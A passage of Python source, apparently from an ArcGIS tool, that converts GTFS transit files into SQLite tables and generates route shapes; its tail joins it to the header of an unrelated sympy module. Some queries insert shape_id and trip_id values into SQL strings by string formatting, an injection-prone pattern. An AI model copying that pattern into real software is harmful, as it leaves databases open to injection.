"wheelchair_accessible" : ("INTEGER", 0)
} ,
"routes" : {
"route_id" : ("TEXT", 1),
"agency_id" : ("TEXT", 0),
"route_short_name": ("TEXT", 0),
"route_long_name": ("TEXT", 0),
"route_desc": ("TEXT", 0),
"route_type": ("INTEGER", 1),
"route_url": ("TEXT", 0),
"route_color": ("TEXT", 0),
"route_text_color": ("TEXT", 0),
} ,
"shapes" : {
"shape_id": ("TEXT", 1),
"shape_pt_lat": ("REAL", 1),
"shape_pt_lon": ("REAL", 1),
"shape_pt_sequence": ("INTEGER", 1),
"shape_dist_traveled": ("REAL", "NULL")
}
}
# SQLize each file we care about, using its own schema and ordering
for GTFSfile in files_to_sqlize:
# Note: a check for existance of each required file is in tool validation
# Open the file for reading
fname = os.path.join(inGTFSdir, GTFSfile) + ".txt"
if ProductName == "ArcGISPro":
f = open(fname, encoding="utf-8-sig")
else:
f = open(fname)
reader = csv.reader(f)
# Put everything in utf-8 to handle BOMs and weird characters.
# Eliminate blank rows (extra newlines) while we're at it.
if ProductName == "ArcGISPro":
reader = ([x.strip() for x in r] for r in reader if len(r) > 0)
else:
reader = ([x.decode('utf-8-sig').strip() for x in r] for r in reader if len(r) > 0)
# First row is column names:
columns = [name.strip() for name in next(reader)]
# Set up the table schema
schema = ""
for col in columns:
try:
# Read the data type from the GTFS schema dictionary
schema = schema + col + " " + sql_schema[GTFSfile][col][0] + ", "
except KeyError:
# If they're using a custom field, preserve it and assume it's text.
schema = schema + col + " TEXT, "
schema = schema[:-2]
# Make sure file has all the required fields
for col in sql_schema[GTFSfile]:
if sql_schema[GTFSfile][col][1] == 1:
if not col in columns:
arcpy.AddError("GTFS file " + GTFSfile + ".txt is missing required field '" + col + "'.")
raise CustomError
# Make sure lat/lon values are valid
if GTFSfile == "stops":
rows = check_latlon_fields(reader, columns, "stop_lat", "stop_lon", "stop_id", fname)
elif GTFSfile == "shapes":
rows = check_latlon_fields(reader, columns, "shape_pt_lat", "shape_pt_lon", "shape_id", fname)
# Otherwise just leave them as they are
else:
rows = reader
# Create the SQL table
c.execute("DROP TABLE IF EXISTS %s;" % GTFSfile)
create_stmt = "CREATE TABLE %s (%s);" % (GTFSfile, schema)
c.execute(create_stmt)
conn.commit()
# Add the data to the table
values_placeholders = ["?"] * len(columns)
c.executemany("INSERT INTO %s (%s) VALUES (%s);" %
(GTFSfile,
",".join(columns),
",".join(values_placeholders))
, rows)
conn.commit()
# If optional columns in routes weren't included in the original data, add them so we don't encounter errors later.
if GTFSfile == "routes":
for col in sql_schema["routes"]:
if not col in columns:
c.execute("ALTER TABLE routes ADD COLUMN %s %s" % (col, sql_schema[GTFSfile][col][0]))
conn.commit()
# If our original data did not have a shape-related fields, add them.
if GTFSfile == "trips":
if 'shape_id' not in columns:
if "shapes" in files_to_sqlize:
arcpy.AddError("Your trips.txt file does not contain a shape_id field. In order to update your shapes.txt file, \
you must first assign each trip_id in trips.txt a valid shape_id. If you do not have this information, it is recommended that you \
create a new shapes.txt file from scratch rather than attempting to update your existing one.")
raise CustomError
c.execute("ALTER TABLE trips ADD COLUMN shape_id TEXT")
conn.commit()
if GTFSfile == "stop_times":
if 'shape_dist_traveled' not in columns:
if "shapes" in files_to_sqlize:
arcpy.AddWarning("Your stop_times.txt file does not contain a shape_dist_traveled field. When you run Step 2 of this tool, \
a shape_dist_traveled field will be added, and it will be populated with valid values for the shape(s) you have chosen to update. However, the \
field will remain blank for all other shapes.")
c.execute("ALTER TABLE stop_times ADD COLUMN shape_dist_traveled REAL")
conn.commit()
if GTFSfile == "shapes":
if 'shape_dist_traveled' not in columns:
arcpy.AddWarning("Your shapes.txt file does not contain a shape_dist_traveled field. When you run Step 2 of this tool, \
a shape_dist_traveled field will be added, and it will be populated with valid values for the shape(s) you have chosen to update. However, the \
field will remain blank for all other shapes.")
c.execute("ALTER TABLE shapes ADD COLUMN shape_dist_traveled REAL")
conn.commit()
f.close ()
# Generate indices
c.execute("CREATE INDEX stoptimes_index_tripIDs ON stop_times (trip_id);")
c.execute("CREATE INDEX trips_index_tripIDs ON trips (trip_id);")
if "shapes" in files_to_sqlize:
c.execute("CREATE INDEX trips_index_shapeIDs ON trips (shape_id);")
c.execute("CREATE INDEX shapes_index_shapeIDs ON shapes (shape_id, shape_pt_sequence);")
def check_latlon_fields(rows, col_names, lat_col_name, lon_col_name, id_col_name, fname):
'''Ensure lat/lon fields are valid'''
def check_latlon_cols(row):
id_val = row[col_names.index(id_col_name)]
lat = row[col_names.index(lat_col_name)]
lon = row[col_names.index(lon_col_name)]
try:
lat_float = float(lat)
except ValueError:
msg = '%s "%s" in %s contains an invalid non-numerical value \
for the %s field: "%s". Please double-check all lat/lon values in your \
%s file.' % (id_col_name, id_val, fname, lat_col_name, lat, fname)
arcpy.AddError(msg)
raise CustomError
try:
stop_lon_float = float(lon)
except ValueError:
msg = '%s "%s" in %s contains an invalid non-numerical value \
for the %s field: "%s". Please double-check all lat/lon values in your \
%s file.' % (id_col_name, id_val, fname, lon_col_name, lon, fname)
arcpy.AddError(msg)
raise CustomError
if not (-90.0 <= lat_float <= 90.0):
msg = '%s "%s" in %s contains an invalid value outside the \
range (-90, 90) the %s field: "%s". %s values must be in valid WGS 84 \
coordinates. Please double-check all lat/lon values in your %s file.\
' % (id_col_name, id_val, fname, lat_col_name, lat, lat_col_name, fname)
arcpy.AddError(msg)
raise CustomError
if not (-180.0 <= stop_lon_float <= 180.0):
msg = '%s "%s" in %s contains an invalid value outside the \
range (-180, 180) the %s field: "%s". %s values must be in valid WGS 84 \
coordinates. Please double-check all lat/lon values in your %s file.\
' % (id_col_name, id_val, fname, lon_col_name, lon, lon_col_name, fname)
arcpy.AddError(msg)
raise CustomError
return row
if ProductName == "ArcGISPro":
return map(check_latlon_cols, rows)
else:
return itertools.imap(check_latlon_cols, rows)
def Generate_Shapes_Street():
'''Generate preliminary shapes for each route by calculating the optimal
route along the network with the Network Analyst Route solver.'''
arcpy.AddMessage("Generating on-street route shapes for routes of the following types, if they exist in your data:")
for rtype in route_type_Street_textlist:
arcpy.AddMessage(rtype)
arcpy.AddMessage("(This step may take a while for large GTFS datasets.)")
# ----- Writing stops in sequence to feature class for Route input -----
arcpy.AddMessage("- Preparing stops")
# Extract only the sequences we want to make street-based shapes for.
sequences_Streets = []
for sequence in sequence_shape_dict:
shape_id = sequence_shape_dict[sequence]
route_id = sequence[0]
route_type = RouteDict[route_id][4]
if route_type in route_types_Street:
sequences_Streets.append(sequence)
# Chunk the sequences so we don't run out of memory in the Route solver.
ChunkSize = 100
sequences_Streets_chunked = []
for i in range(0, len(sequences_Streets), ChunkSize):
sequences_Streets_chunked.append(sequences_Streets[i:i+ChunkSize])
# Huge loop over each chunk.
totchunks = len(sequences_Streets_chunked)
chunkidx = 1
global NoRouteGenerated
global badStops
unlocated_stops = []
for chunk in sequences_Streets_chunked:
arcpy.AddMessage("- Calculating Routes part %s of %s." % (str(chunkidx), str(totchunks)))
chunkidx += 1
InputRoutePoints = arcpy.management.CreateFeatureclass(outGDB, "TempInputRoutePoints", "POINT", outSequencePoints, "", "", WGSCoords)
# Add the StopPairs table to the feature class.
shapes_in_chunk = []
if useBearing:
# Calculate the bearing value for each stop and insert
with arcpy.da.InsertCursor(InputRoutePoints, ["SHAPE@", "shape_id", "sequence", "CurbApproach", "stop_id", "Bearing", "BearingTol"]) as cur:
for sequence in chunk:
bearingdict = getBearingsForSequence(sequence[1])
shape_id = sequence_shape_dict[sequence]
shapes_in_chunk.append(shape_id)
sequence_num = 1
for stop in sequence[1]:
try:
stopGeom = stopgeom_dict[stop]
try:
Bearing = bearingdict[stop]
except KeyError:
# If we couldn't calculate the bearing for some reason, just leave it as null, and Add Locations will locate it normally.
Bearing = None
except KeyError:
badStops.append(stop)
sequence_num += 1
continue
cur.insertRow((stopGeom, shape_id, sequence_num, CurbApproach, stop, Bearing, BearingTol))
sequence_num += 1
else:
# Insert shapes and location fields
with arcpy.da.InsertCursor(InputRoutePoints, ["SHAPE@X", "SHAPE@Y", "shape_id", "sequence", "CurbApproach", "stop_id", "SourceID", "SourceOID", "PosAlong", "SideOfEdge"]) as cur:
for sequence in chunk:
shape_id = sequence_shape_dict[sequence]
shapes_in_chunk.append(shape_id)
sequence_num = 1
for stop in sequence[1]:
try:
stop_lat = stoplatlon_dict[stop][0]
stop_lon = stoplatlon_dict[stop][1]
SourceID = stoplocfielddict[stop][0]
SourceOID = stoplocfielddict[stop][1]
PosAlong = stoplocfielddict[stop][2]
SideOfEdge = stoplocfielddict[stop][3]
except KeyError:
badStops.append(stop)
sequence_num += 1
continue
cur.insertRow((float(stop_lon), float(stop_lat), shape_id, sequence_num, CurbApproach, stop, SourceID, SourceOID, PosAlong, SideOfEdge))
sequence_num += 1
# ----- Generate routes ------
# Note: The reason we use hierarchy is to ensure that the entire network doesn't gets searched
# if a route can't be found between two points
RLayer = arcpy.na.MakeRouteLayer(inNetworkDataset, "TransitShapes", impedanceAttribute,
find_best_order="USE_INPUT_ORDER",
UTurn_policy=UTurns,
restriction_attribute_name=restrictions,
hierarchy="USE_HIERARCHY",
output_path_shape="TRUE_LINES_WITH_MEASURES").getOutput(0)
# To refer to the Route sublayers, get the sublayer names. This is essential for localization.
naSubLayerNames = arcpy.na.GetNAClassNames(RLayer)
stopsSubLayer = naSubLayerNames["Stops"]
# Map fields to ensure that each shape gets its own route.
fieldMappings = arcpy.na.NAClassFieldMappings(RLayer, stopsSubLayer, True)
fieldMappings["RouteName"].mappedFieldName = "shape_id"
fieldMappings["CurbApproach"].mappedFieldName = "CurbApproach"
if not useBearing:
fieldMappings["SourceID"].mappedFieldName = "SourceID"
fieldMappings["SourceOID"].mappedFieldName = "SourceOID"
fieldMappings["PosAlong"].mappedFieldName = "PosAlong"
fieldMappings["SideOfEdge"].mappedFieldName = "SideOfEdge"
# Note: Bearing and BearingTol fields are magically used without explicit field mapping
# See http://desktop.arcgis.com/en/arcmap/latest/extensions/network-analyst/bearing-and-bearingtol-what-are.htm
arcpy.na.AddLocations(RLayer, stopsSubLayer, InputRoutePoints, fieldMappings,
sort_field="sequence",
append="CLEAR")
# Use a simplification tolerance on Solve to reduce the number of vertices
# in the output lines (to make shapes.txt files smaller and to make the
# linear referencing quicker.
simpTol = "2 Meters"
try:
SolvedLayer = arcpy.na.Solve(RLayer, ignore_invalids=True, simplification_tolerance=simpTol)
except:
arcpy.AddWarning("Unable to create on-street Routes because the Solve failed.")
arcpy.AddWarning("Solve warning messages:")
arcpy.AddWarning(arcpy.GetMessages(1))
arcpy.AddWarning("Solve error messages:")
arcpy.AddWarning(arcpy.GetMessages(2))
NoRouteGenerated += shapes_in_chunk
continue
# If any of the routes couldn't be solved, they will leave a warning.
# Save the shape_ids so we can generate straight-line routes for them.
# Similarly, if any stops were skipped because they were unlocated, they will leave a warning.
warnings = arcpy.GetMessages(1)
warninglist = warnings.split("\n")
for w in warninglist:
if re.match('No route for ', w):
thingsInQuotes = re.findall('"(.+?)"', w)
NoRouteGenerated.append(thingsInQuotes[0])
elif re.search(' is unlocated.', w):
thingsInQuotes = re.findall('"(.+?)"', w)
unlocated_stops.append(thingsInQuotes[0])
# Make layer objects for each sublayer we care about.
if ProductName == "ArcGISPro":
RoutesLayer = RLayer.listLayers(naSubLayerNames["Routes"])[0]
else:
RoutesLayer = arcpy.mapping.ListLayers(RLayer, naSubLayerNames["Routes"])[0]
# ----- Save routes to feature class -----
# Uncomment this if you want to save the Stops layer from Route.
##StopsLayer = arcpy.mapping.ListLayers(RLayer, stopsSubLayer)[0]
##arcpy.CopyFeatures_management(StopsLayer, os.path.join(outGDB, "TestOutStops"))
# Save the output routes.
if not arcpy.Exists(outRoutesfc):
arcpy.management.CopyFeatures(RoutesLayer, outRoutesfc)
else:
arcpy.management.Append(RoutesLayer, outRoutesfc)
arcpy.management.Delete(SolvedLayer)
# Add the stop sequences to the final output FC and delete the temporary one.
arcpy.management.Append(InputRoutePoints, outSequencePoints)
arcpy.management.Delete(InputRoutePoints)
if NoRouteGenerated:
arcpy.AddWarning("On-street route shapes for the following shape_ids could \
not be generated. Straight-line route shapes will be generated for these \
shape_ids instead:")
arcpy.AddWarning(sorted(NoRouteGenerated))
arcpy.AddWarning("If you are unhappy with this result, try re-running your \
analysis with a different u-turn policy and/or network restrictions, and check your \
network dataset for connectivity problems.")
if unlocated_stops:
unlocated_stops = sorted(list(set(unlocated_stops)))
arcpy.AddWarning("The following stop_ids could not be located on your network dataset and were skipped when route shapes were generated. \
If you are unhappy with this result, please double-check your stop_lat and stop_lon values in stops.txt and your network dataset geometry \
to make sure everything is correct.")
def Generate_Shapes_AGOL():
'''Generate preliminary shapes for each route by calculating the optimal
route along the network using the ArcGIS Online route services.'''
arcpy.AddMessage("Generating on-street route shapes via ArcGIS Online for routes of the following types, if they exist in your data:")
for rtype in route_type_Street_textlist:
arcpy.AddMessage(rtype)
arcpy.AddMessage("(This step may take a while for large GTFS datasets.)")
global NoRouteGenerated
NoRouteGenerated = []
Too_Many_Stops = []
global badStops
# ----- Generate a route for each sequence -----
arcpy.AddMessage("- Generating routes using ArcGIS Online")
# Set up input parameters for route request
service_params = {}
service_params["travelMode"] = AGOLRouteHelper.travel_mode
service_params["returnRoutes"] = True
service_params["outputLines"] = "esriNAOutputLineTrueShapeWithMeasure"
service_params["returnDirections"] = False
service_params["outSR"] = WGSCoords_WKID
# Create the output feature class
arcpy.management.CreateFeatureclass(outGDB, outRoutesfcName, "POLYLINE", '', '', '', WGSCoords)
arcpy.management.AddField(outRoutesfc, "Name", "TEXT")
# Set up insertCursors for output shapes polylines and stop sequences
# Have to open an edit session to have two simultaneous InsertCursors.
edit = arcpy.da.Editor(outGDB)
ucursor = arcpy.da.InsertCursor(outRoutesfc, ["SHAPE@", "Name"])
cur = arcpy.da.InsertCursor(outSequencePoints, ["SHAPE@X", "SHAPE@Y", "shape_id", "sequence", "stop_id", "CurbApproach", "Bearing", "BearingTol"])
edit.startEditing()
# Generate routes with AGOL for sequences we want to make street-based shapes for.
sequences_Streets = []
num_shapes = len(sequence_shape_dict)
next_threshold = 10
progress = 0.0
num_routes_calculated = 0
for sequence in sequence_shape_dict:
# Print some progress indicators
progress += 1
percdone = (progress / num_shapes) * 100
if percdone > next_threshold:
last_threshold = percdone - percdone%10
arcpy.AddMessage("%s%% finished" % str(int(last_threshold)))
next_threshold = last_threshold + 10
shape_id = sequence_shape_dict[sequence]
route_id = sequence[0]
route_type = RouteDict[route_id][4]
if route_type not in route_types_Street:
continue
if len(sequence[1]) > AGOLRouteHelper.route_stop_limit:
# There are too many stops in this route to solve with the online services.
Too_Many_Stops.append(shape_id)
continue
bearingdict = getBearingsForSequence(sequence[1])
sequence_num = 1
pt = arcpy.Point()
features = []
for stop in sequence[1]:
try:
stop_lat = stoplatlon_dict[stop][0]
stop_lon = stoplatlon_dict[stop][1]
except KeyError:
badStops.append(stop)
sequence_num += 1
continue
# Add stop sequences to points fc for user to look at.
pt.X = float(stop_lon)
pt.Y = float(stop_lat)
cur.insertRow((float(stop_lon), float(stop_lat), shape_id, sequence_num, stop, CurbApproach, bearingdict[stop], BearingTol))
sequence_num = sequence_num + 1
geom = {"x": float(stop_lon),
"y": float(stop_lat),
"spatialReference": {"wkid": WGSCoords_WKID}}
attributes = {"Name": stop,
"CurbApproach": CurbApproach}
if bearingdict[stop] != None:
attributes["Bearing"] = bearingdict[stop]
attributes["BearingTol"] = BearingTol
features.append({"geometry": geom, "attributes": attributes})
service_params["stops"] = {"features": features}
routeshapes, errors = AGOLRouteHelper.generate_routes_from_AGOL_as_polylines(AGOLRouteHelper.token, service_params)
if errors:
if "User does not have permissions to access" in errors:
arcpy.AddError("ArcGIS Online route generation failed. Please ensure that your ArcGIS Online account \
has routing privileges and sufficient credits for this analysis.")
raise CustomError
arcpy.AddWarning("ArcGIS Online route generation for shape_id %s failed. A straight-line shape will be generated for this shape_id instead. %s" % (shape_id, errors))
NoRouteGenerated.append(shape_id)
continue
for route in routeshapes: # actually, only one shape should be returned here, but loop just in case
ucursor.insertRow((route, shape_id))
num_routes_calculated += 1
del ucursor
del cur
edit.stopEditing(True)
arcpy.AddMessage("Done generating route shapes with ArcGIS Online. Number of ArcGIS Online routes calculated: %s" % str(num_routes_calculated))
if Too_Many_Stops:
arcpy.AddWarning("On-street route shapes for the following shape_ids could \
not be generated because the number of stops in the route exceeds the ArcGIS Online \
service limit of %s stops. Straight-line route shapes will be generated for these \
shape_ids instead:" % str(AGOLRouteHelper.route_stop_limit))
arcpy.AddWarning(sorted(Too_Many_Stops))
NoRouteGenerated.append(shape for shape in Too_Many_Stops)
def Generate_Shapes_Straight(Created_Street_Output):
'''Generate route shapes as straight lines between stops.'''
arcpy.AddMessage("Generating straight-line route shapes for routes of the following types, if they exist in your data:")
for rtype in route_type_Straight_textlist:
arcpy.AddMessage(rtype)
arcpy.AddMessage("(This step may take a while for large GTFS datasets.)")
# If we didn't already create the output feature class with the Street-based routes, create it now.
if not Created_Street_Output or not arcpy.Exists(outRoutesfc):
arcpy.management.CreateFeatureclass(outGDB, outRoutesfcName, "POLYLINE", '', "ENABLED", "DISABLED", WGSCoords)
arcpy.management.AddField(outRoutesfc, "Name", "TEXT")
spatial_ref = WGSCoords
else:
spatial_ref = arcpy.Describe(outRoutesfc).spatialReference
# ----- Create polylines using stops as vertices -----
# Set up insertCursors for output shapes polylines and stop sequences
# Have to open an edit session to have two simultaneous InsertCursors.
edit = arcpy.da.Editor(outGDB)
ucursor = arcpy.da.InsertCursor(outRoutesfc, ["SHAPE@", "Name"])
cur = arcpy.da.InsertCursor(outSequencePoints, ["SHAPE@X", "SHAPE@Y", "shape_id", "sequence", "stop_id"])
edit.startEditing()
global badStops
for sequence in sequence_shape_dict:
shape_id = sequence_shape_dict[sequence]
route_id = sequence[0]
route_type = RouteDict[route_id][4]
if route_type in route_types_Straight or shape_id in NoRouteGenerated:
sequence_num = 1
# Add stop sequence to an Array of Points
array = arcpy.Array()
pt = arcpy.Point()
for stop in sequence[1]:
try:
stop_lat = stoplatlon_dict[stop][0]
stop_lon = stoplatlon_dict[stop][1]
except KeyError:
if shape_id not in NoRouteGenerated:
# Don't repeat a warning if they already got it once.
badStops.append(stop)
sequence_num += 1
continue
pt.X = float(stop_lon)
pt.Y = float(stop_lat)
pt.M = sequence_num - 1 # Insert dummy M value
# Add stop sequences to points fc for user to look at.
cur.insertRow((float(stop_lon), float(stop_lat), shape_id, sequence_num, stop))
sequence_num = sequence_num + 1
array.add(pt)
# Generate a Polyline from the Array of stops
polyline = arcpy.Polyline(array, WGSCoords, None, True)
# Project the polyline to the correct output coordinate system.
if spatial_ref != WGSCoords:
polyline.projectAs(spatial_ref)
# Add the polyline to the Shapes feature class
ucursor.insertRow((polyline, shape_id))
del ucursor
del cur
edit.stopEditing(True)
def connect_to_sql(SQLDbase):
global c, conn
conn = sqlite3.connect(SQLDbase)
c = conn.cursor()
def check_Arc_version(useAGOL=False, useNA=False):
'''Check that the user has a version of ArcGIS that can support this tool.'''
ArcVersionInfo = arcpy.GetInstallInfo("desktop")
ArcVersion = ArcVersionInfo['Version']
global ProductName
ProductName = ArcVersionInfo['ProductName']
global useBearing
if ProductName == "ArcGISPro":
if ArcVersion in ["1.0", "1.1", "1.1.1"]:
arcpy.AddError("You must have ArcGIS Pro 1.2 or higher to run this \
tool. You have ArcGIS Pro version %s." % ArcVersion)
raise CustomError
if useNA and ArcVersion in ["1.0", "1.0.1", "1.0.2", "1.1", "1.1.1", "1.2", "1.3", "1.3.1", "1.4", "1.4.1"]:
# Bearing and BearingTol fields did not work until Pro 2.0.
arcpy.AddWarning("Warning! Certain functionality was implemented in ArcGIS Pro 2.0 that \
significantly improves the output of this tool. For better results, upgrade to the latest version of ArcGIS Pro or run \
this tool with ArcMap version 10.3 or higher.")
useBearing = False
else:
if ArcVersion == "10.0":
arcpy.AddError("You must have ArcGIS 10.2.1 or higher (or ArcGIS Pro) to run this \
tool. You have ArcGIS version %s." % ArcVersion)
raise CustomError
if ArcVersion in ["10.1", "10.2"]:
arcpy.AddWarning("Warning! You can run Step 1 of this tool in \
ArcGIS 10.1 or 10.2, but you will not be able to run Step 2 without ArcGIS \
10.2.1 or higher (or ArcGIS Pro). You have ArcGIS version %s." % ArcVersion)
if useNA:
useBearing = False
if useAGOL and ArcVersion in ["10.2.1", "10.2.2"]:
arcpy.AddError("You must have ArcGIS 10.3 (or ArcGIS Pro) to run the ArcGIS Online \
version of this tool. You have ArcGIS version %s." % ArcVersion)
raise CustomError
if useNA and ArcVersion in ["10.2.1", "10.2.2"]:
arcpy.AddWarning("Warning! This version of Step 1 will produce significantly \
better output using ArcGIS version 10.3 or higher or ArcGIS Pro 2.0 or higher. You have ArcGIS version %s." % ArcVersion)
useBearing = False
def get_stop_lat_lon():
'''Populate a dictionary of {stop_id: [stop_lat, stop_lon]}'''
arcpy.AddMessage("Collecting and processing GTFS stop information...")
# Find all stops with lat/lon
global stoplatlon_dict
stoplatlon_dict = {}
cs = conn.cursor()
stoplatlonfetch = '''
SELECT stop_id, stop_lat, stop_lon FROM stops
;'''
cs.execute(stoplatlonfetch)
for stop in cs:
# Add stop lat/lon to dictionary
stoplatlon_dict[stop[0]] = [stop[1], stop[2]]
def get_stop_geom():
'''Populate a dictionary of {stop_id: stop point geometry object}'''
global stopgeom_dict
stopgeom_dict = {}
for stop in stoplatlon_dict:
lat = stoplatlon_dict[stop][0]
lon = stoplatlon_dict[stop][1]
point = arcpy.Point(lon, lat)
ptGeometry = arcpy.PointGeometry(point, WGSCoords)
stopgeom_dict[stop] = ptGeometry
def getBearingsForSequence(sequence):
'''Populate a dictionary of {stop_id: bearing}. Applies only to a given stop sequence. The same stop
could have a different bearing if visited by a trip with a different shape.'''
bearingdict = {}
previous_angle = None
for idx in range(len(sequence)):
try:
current_stop = sequence[idx]
if idx == len(sequence)-1:
# This is the last stop in the sequence, so just use the previous angle as the bearing.
bearingdict[current_stop] = previous_angle
angle_to_next = None
else:
# Calculate the angle from this stop to the next one in the sequence
current_stop_geom = stopgeom_dict[current_stop]
next_stop_geom = stopgeom_dict[sequence[idx+1]]
# Note: angleAndDistanceTo was added in ArcGIS 10.3
angle_to_next = current_stop_geom.angleAndDistanceTo(next_stop_geom, "GEODESIC")[0]
if previous_angle == None:
# This is the first stop, so use the angle to the second stop as the bearing
bearingdict[current_stop] = angle_to_next
else:
# If this is an intermediate stop, estimate the bearing based on the angle between this stop and the previous and next one
# If the anle to the next one and the angle from the previous one are very different, the route is probably going around a corner,
# and we can't reliably estimate what the bearing should be by averaging, so don't try to use a bearing for this one.
diff = abs(angle_to_next - previous_angle)
if diff >= MaxAngle:
bearingdict[current_stop] = None
else:
# If they're sufficiently similar angles, use some trigonometry to average the angle from the previous stop to this one and the angle of this one to the next one
angle_to_next_rad = np.deg2rad(angle_to_next)
previous_angle_rad = np.deg2rad(previous_angle)
bearing = np.rad2deg(np.arctan2((np.sin(previous_angle_rad) + np.sin(angle_to_next_rad))/2, (np.cos(previous_angle_rad) + np.cos(angle_to_next_rad))/2))
bearingdict[current_stop] = bearing
previous_angle = angle_to_next
except KeyError as err:
arcpy.AddWarning("Key error in getBearingsForSequence")
arcpy.AddWarning(err)
continue
return bearingdict
def calculate_stop_location_fields():
'''Calculate location fields for the stops and save them to a dictionary so that Network Analyst Add Locations will be faster later'''
arcpy.AddMessage("Calculating network locations fields...")
# Temporary feature class of stops for calculating location fields
arcpy.management.CreateFeatureclass(outGDB, "TempStopswLocationFields", "POINT", "", "", "", WGSCoords)
LocFieldStops = os.path.join(outGDB, "TempStopswLocationFields")
arcpy.management.AddField(LocFieldStops, "stop_id", "TEXT")
with arcpy.da.InsertCursor(LocFieldStops, ["SHAPE@X", "SHAPE@Y", "stop_id"]) as cur:
for stop in stoplatlon_dict:
# Insert stop into fc for location field calculation
stop_lat = stoplatlon_dict[stop][0]
stop_lon = stoplatlon_dict[stop][1]
cur.insertRow((float(stop_lon), float(stop_lat), stop))
# It would be easier to use CalculateLocations, but then we can't
# exclude restricted network elements.
# Instead, create a dummy Route layer and Add Locations
RLayer = arcpy.na.MakeRouteLayer(inNetworkDataset, "DummyLayer", impedanceAttribute,
restriction_attribute_name=restrictions).getOutput(0)
naSubLayerNames = arcpy.na.GetNAClassNames(RLayer)
stopsSubLayer = naSubLayerNames["Stops"]
fieldMappings = arcpy.na.NAClassFieldMappings(RLayer, stopsSubLayer)
fieldMappings["Name"].mappedFieldName = "stop_id"
arcpy.na.AddLocations(RLayer, stopsSubLayer, LocFieldStops, fieldMappings,
search_criteria=search_criteria,
snap_to_position_along_network="NO_SNAP",
exclude_restricted_elements="EXCLUDE")
if ProductName == "ArcGISPro":
StopsLayer = RLayer.listLayers(stopsSubLayer)[0]
else:
StopsLayer = arcpy.mapping.ListLayers(RLayer, stopsSubLayer)[0]
# Iterate over the located stops and create a dictionary of location fields
global stoplocfielddict
stoplocfielddict = {}
with arcpy.da.SearchCursor(StopsLayer, ["Name", "SourceID", "SourceOID", "PosAlong", "SideOfEdge"]) as cur:
for stop in cur:
locfields = [stop[1], stop[2], stop[3], stop[4]]
stoplocfielddict[stop[0]] = locfields
arcpy.management.Delete(StopsLayer)
arcpy.management.Delete(LocFieldStops)
def get_route_info():
'''Create a dictionary of {route_id: [all route.txt fields + route_type_text]}'''
arcpy.AddMessage("Collecting GTFS route information...")
# GTFS route_type information
#0 - Tram, Streetcar, Light rail. Any light rail or street level system within a metropolitan area.
#1 - Subway, Metro. Any underground rail system within a metropolitan area.
#2 - Rail. Used for intercity or long-distance travel.
#3 - Bus. Used for short- and long-distance bus routes.
#4 - Ferry. Used for short- and long-distance boat service.
#5 - Cable car. Used for street-level cable cars where the cable runs beneath the car.
#6 - Gondola, Suspended cable car. Typically used for aerial cable cars where the car is suspended from the cable.
#7 - Funicular. Any rail system designed for steep inclines.
route_type_dict = {0: "Tram, Streetcar, Light rail",
1: "Subway, Metro",
2: "Rail",
3: "Bus",
4: "Ferry",
5: "Cable car",
6: "Gondola, Suspended cable car",
7: "Funicular"}
# Find all routes and associated info.
global RouteDict
RouteDict = {}
cr = conn.cursor()
routesfetch = '''
SELECT route_id, agency_id, route_short_name, route_long_name,
route_desc, route_type, route_url, route_color, route_text_color
FROM routes
;'''
cr.execute(routesfetch)
for route in cr:
# {route_id: [all route.txt fields + route_type_text]}
try:
route_type = route[5]
route_type_text = route_type_dict[int(route_type)]
except:
route_type = 100
route_type_text = "Other / Type not specified"
RouteDict[route[0]] = [route[1], route[2], route[3], route[4], route_type,
route[6], route[7], route[8],
route_type_text]
def get_trip_route_info():
'''Create a dictionary of {trip_id: route_id}'''
global trip_route_dict
trip_route_dict = {}
ctr = conn.cursor()
triproutefetch = '''
SELECT trip_id, route_id FROM trips
;'''
ctr.execute(triproutefetch)
for triproute in ctr:
# {trip_id: route_id}
trip_route_dict[triproute[0]] = triproute[1]
def get_trips_with_shape_id(shape):
'''Return a list of trip_ids that use the specified shape'''
tripsfetch = '''SELECT trip_id FROM trips WHERE shape_id="%s";''' % shape
c.execute(tripsfetch)
trips = c.fetchall()
return [trip[0] for trip in trips]
def get_trip_stop_sequence(trip_id):
'''Return a sequence of stop_id values, in the correct order, for a given trip'''
stopfetch = "SELECT stop_id, stop_sequence FROM stop_times WHERE trip_id='%s'" % trip_id
c.execute(stopfetch)
selectedstops = c.fetchall()
# Sort the stop list by sequence.
selectedstops.sort(key=operator.itemgetter(1))
stop_sequence = ()
for stop in selectedstops:
stop_sequence += (stop[0],)
return stop_sequence
def get_unique_stop_sequences():
'''Find the unique sequences of stops from stop_times.txt. Each unique sequence is a new shape.'''
arcpy.AddMessage("Calculating unique sequences of stops...")
# Find all trip_ids.
ct = conn.cursor()
tripsfetch = '''
SELECT DISTINCT trip_id FROM stop_times
;'''
ct.execute(tripsfetch)
# Select stops in that trip
global sequence_shape_dict, shape_trip_dict
sequence_shape_dict = {}
shape_trip_dict = {}
shape_id = 1
for trip in ct:
stop_sequence = get_trip_stop_sequence(trip[0])
route_id = trip_route_dict[trip[0]]
sequence_shape_dict_key = (route_id, stop_sequence)
try:
sh = sequence_shape_dict[sequence_shape_dict_key]
shape_trip_dict.setdefault(sh, []).append(trip[0])
except KeyError:
sequence_shape_dict[sequence_shape_dict_key] = str(shape_id)
shape_trip_dict.setdefault(str(shape_id), []).append(trip[0])
shape_id += 1
numshapes = shape_id - 1
arcpy.AddMessage("Your GTFS data contains %s unique shapes." % str(numshapes))
def append_existing_shape_to_fc(shape, StopsCursor, route=None):
if route:
# Retrieve route info for final output file.
route_short_name = RouteDict[route][1]
route_long_name = RouteDict[route][2]
if RouteDict[route][3]:
route_desc = RouteDict[route][3][:max_route_desc_length]
else:
route_desc = ""
route_type = RouteDict[route][4]
route_type_text = RouteDict[route][8]
else:
# Couldn't get route info for this shape
route = ""
route_short_name = ""
route_long_name = ""
route_desc = ""
route_type = 0
route_type_text = ""
# Fetch the shape info to create the polyline feature.
cp = conn.cursor()
pointsinshapefetch = '''
SELECT shape_pt_lat, shape_pt_lon FROM shapes
WHERE shape_id='%s'
ORDER BY shape_pt_sequence;''' % shape
cp.execute(pointsinshapefetch)
# Create the polyline feature from the sequence of points
polyline = [(float(point[1]), float(point[0])) for point in cp]
# Add the polyline feature to the output feature class
StopsCursor.insertRow((polyline, shape, route,
route_short_name, route_long_name, route_desc,
route_type, route_type_text,))
|
sympy/physics/quantum/constants.py
|
shipci/sympy
| 319 |
67778
|
"""Constants (like hbar) related to quantum mechanics."""
from __future__ import print_function, division
from sympy.core.numbers import NumberSymbol
from sympy.core.singleton import Singleton
from sympy.core.compatibility import u, with_metaclass
from sympy.printing.pretty.stringpict import prettyForm
